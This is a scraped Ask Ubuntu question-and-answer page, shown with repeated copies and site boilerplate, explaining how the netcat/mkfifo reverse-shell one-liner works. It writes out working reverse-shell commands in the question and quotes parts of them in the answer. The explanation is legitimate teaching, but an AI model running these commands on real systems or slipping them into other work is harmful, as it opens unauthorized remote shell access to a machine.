How does this command work? (reverse shell)
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ margin-bottom:0;
}
There was a simple way to connect two systems and getting a shell using nc command as below.
machine A to listen
nc -nlvp 4444
machine B to connect
nc 192.168.4.4 4444 -e /bin/bash
However the -e option is no more, The man pages recommends to follow as below to execute commands
machine A to listen
nc -nlvp 4444
machine B to connect
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f
I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.
command-line networking bash netcat
add a comment |
There was a simple way to connect two systems and getting a shell using nc command as below.
machine A to listen
nc -nlvp 4444
machine B to connect
nc 192.168.4.4 4444 -e /bin/bash
However the -e option is no more, The man pages recommends to follow as below to execute commands
machine A to listen
nc -nlvp 4444
machine B to connect
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f
I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.
command-line networking bash netcat
add a comment |
There was a simple way to connect two systems and getting a shell using nc command as below.
machine A to listen
nc -nlvp 4444
machine B to connect
nc 192.168.4.4 4444 -e /bin/bash
However the -e option is no more, The man pages recommends to follow as below to execute commands
machine A to listen
nc -nlvp 4444
machine B to connect
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f
I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.
command-line networking bash netcat
There was a simple way to connect two systems and getting a shell using nc command as below.
machine A to listen
nc -nlvp 4444
machine B to connect
nc 192.168.4.4 4444 -e /bin/bash
However the -e option is no more, The man pages recommends to follow as below to execute commands
machine A to listen
nc -nlvp 4444
machine B to connect
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f
I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.
command-line networking bash netcat
command-line networking bash netcat
edited Mar 26 at 1:22
Sergiy Kolodyazhnyy
74.9k9155326
74.9k9155326
asked Mar 21 at 5:47
GoronGoron
1669
1669
add a comment |
add a comment |
1 Answer
1
active
oldest
votes
Let's think in standard streams, stdin
and stderr
for a minute.
nc 192.168.4.4 4444 >/tmp/f
The stdout
stream of nc
gets duplicated to /tmp/f
fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1
. As far as nc
is concerned, it just has to send that data back to the other machine.
Well, what does /bin/sh -i
do ? It invokes interactive shell - the one where you type commands and print output to stdout
. The user@host
prompt is typically (if not always) printed to stderr
, but we need to send that to remote machine, hence 2>&1
redirection is applied to send the prompt via pipe. Well, we can't use stdout
to print the output - the shell has to send that to nc 192.168.4.4 4444
to be sent over the network. We can't read stdin
either - cat /tmp/f
will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin
is rewired an application isn't aware of it unless it is actively checking.
$ echo 'df' | sh -i
$ Filesystem 1K-blocks Used Available Use% Mounted on
udev 4000944 0 4000944 0% /dev
tmpfs 805348 1400 803948 1% /run
/dev/sda1 28717732 25907684 1328188 96% /
tmpfs 4026732 97496 3929236 3% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
/dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
tmpfs 805344 32 805312 1% /run/user/1000
$
sh: 1: Cannot set tty process group (No such process)
So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc
. The commands sent from remote to local shell are written by nc
to the fifo. And so the loop goes on and on.
NOTE: nc
doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh
. The ssh
protocol was designed specifically for that purpose.
add a comment |
Your Answer
StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "89"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});
function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});
}
});
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1127431%2fhow-does-this-command-work-reverse-shell%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
Let's think in standard streams, stdin
and stderr
for a minute.
nc 192.168.4.4 4444 >/tmp/f
The stdout
stream of nc
gets duplicated to /tmp/f
fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1
. As far as nc
is concerned, it just has to send that data back to the other machine.
Well, what does /bin/sh -i
do ? It invokes interactive shell - the one where you type commands and print output to stdout
. The user@host
prompt is typically (if not always) printed to stderr
, but we need to send that to remote machine, hence 2>&1
redirection is applied to send the prompt via pipe. Well, we can't use stdout
to print the output - the shell has to send that to nc 192.168.4.4 4444
to be sent over the network. We can't read stdin
either - cat /tmp/f
will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin
is rewired an application isn't aware of it unless it is actively checking.
$ echo 'df' | sh -i
$ Filesystem 1K-blocks Used Available Use% Mounted on
udev 4000944 0 4000944 0% /dev
tmpfs 805348 1400 803948 1% /run
/dev/sda1 28717732 25907684 1328188 96% /
tmpfs 4026732 97496 3929236 3% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
/dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
tmpfs 805344 32 805312 1% /run/user/1000
$
sh: 1: Cannot set tty process group (No such process)
So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc
. The commands sent from remote to local shell are written by nc
to the fifo. And so the loop goes on and on.
NOTE: nc
doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh
. The ssh
protocol was designed specifically for that purpose.
add a comment |
Let's think in standard streams, stdin
and stderr
for a minute.
nc 192.168.4.4 4444 >/tmp/f
The stdout
stream of nc
gets duplicated to /tmp/f
fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1
. As far as nc
is concerned, it just has to send that data back to the other machine.
Well, what does /bin/sh -i
do ? It invokes interactive shell - the one where you type commands and print output to stdout
. The user@host
prompt is typically (if not always) printed to stderr
, but we need to send that to remote machine, hence 2>&1
redirection is applied to send the prompt via pipe. Well, we can't use stdout
to print the output - the shell has to send that to nc 192.168.4.4 4444
to be sent over the network. We can't read stdin
either - cat /tmp/f
will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin
is rewired an application isn't aware of it unless it is actively checking.
$ echo 'df' | sh -i
$ Filesystem 1K-blocks Used Available Use% Mounted on
udev 4000944 0 4000944 0% /dev
tmpfs 805348 1400 803948 1% /run
/dev/sda1 28717732 25907684 1328188 96% /
tmpfs 4026732 97496 3929236 3% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
/dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
tmpfs 805344 32 805312 1% /run/user/1000
$
sh: 1: Cannot set tty process group (No such process)
So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc
. The commands sent from remote to local shell are written by nc
to the fifo. And so the loop goes on and on.
NOTE: nc
doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh
. The ssh
protocol was designed specifically for that purpose.
add a comment |
Let's think in standard streams, stdin
and stderr
for a minute.
nc 192.168.4.4 4444 >/tmp/f
The stdout
stream of nc
gets duplicated to /tmp/f
fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1
. As far as nc
is concerned, it just has to send that data back to the other machine.
Well, what does /bin/sh -i
do ? It invokes interactive shell - the one where you type commands and print output to stdout
. The user@host
prompt is typically (if not always) printed to stderr
, but we need to send that to remote machine, hence 2>&1
redirection is applied to send the prompt via pipe. Well, we can't use stdout
to print the output - the shell has to send that to nc 192.168.4.4 4444
to be sent over the network. We can't read stdin
either - cat /tmp/f
will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin
is rewired an application isn't aware of it unless it is actively checking.
$ echo 'df' | sh -i
$ Filesystem 1K-blocks Used Available Use% Mounted on
udev 4000944 0 4000944 0% /dev
tmpfs 805348 1400 803948 1% /run
/dev/sda1 28717732 25907684 1328188 96% /
tmpfs 4026732 97496 3929236 3% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
/dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
tmpfs 805344 32 805312 1% /run/user/1000
$
sh: 1: Cannot set tty process group (No such process)
So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc
. The commands sent from remote to local shell are written by nc
to the fifo. And so the loop goes on and on.
NOTE: nc
doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh
. The ssh
protocol was designed specifically for that purpose.
Let's think in standard streams, stdin
and stderr
for a minute.
nc 192.168.4.4 4444 >/tmp/f
The stdout
stream of nc
gets duplicated to /tmp/f
fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1
. As far as nc
is concerned, it just has to send that data back to the other machine.
Well, what does /bin/sh -i
do ? It invokes interactive shell - the one where you type commands and print output to stdout
. The user@host
prompt is typically (if not always) printed to stderr
, but we need to send that to remote machine, hence 2>&1
redirection is applied to send the prompt via pipe. Well, we can't use stdout
to print the output - the shell has to send that to nc 192.168.4.4 4444
to be sent over the network. We can't read stdin
either - cat /tmp/f
will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin
is rewired an application isn't aware of it unless it is actively checking.
$ echo 'df' | sh -i
$ Filesystem 1K-blocks Used Available Use% Mounted on
udev 4000944 0 4000944 0% /dev
tmpfs 805348 1400 803948 1% /run
/dev/sda1 28717732 25907684 1328188 96% /
tmpfs 4026732 97496 3929236 3% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
/dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
tmpfs 805344 32 805312 1% /run/user/1000
$
sh: 1: Cannot set tty process group (No such process)
So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc
. The commands sent from remote to local shell are written by nc
to the fifo. And so the loop goes on and on.
NOTE: nc
doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh
. The ssh
protocol was designed specifically for that purpose.
edited Mar 23 at 1:44
answered Mar 21 at 6:43
Sergiy KolodyazhnyySergiy Kolodyazhnyy
74.9k9155326
74.9k9155326
add a comment |
add a comment |
Thanks for contributing an answer to Ask Ubuntu!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1127431%2fhow-does-this-command-work-reverse-shell%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown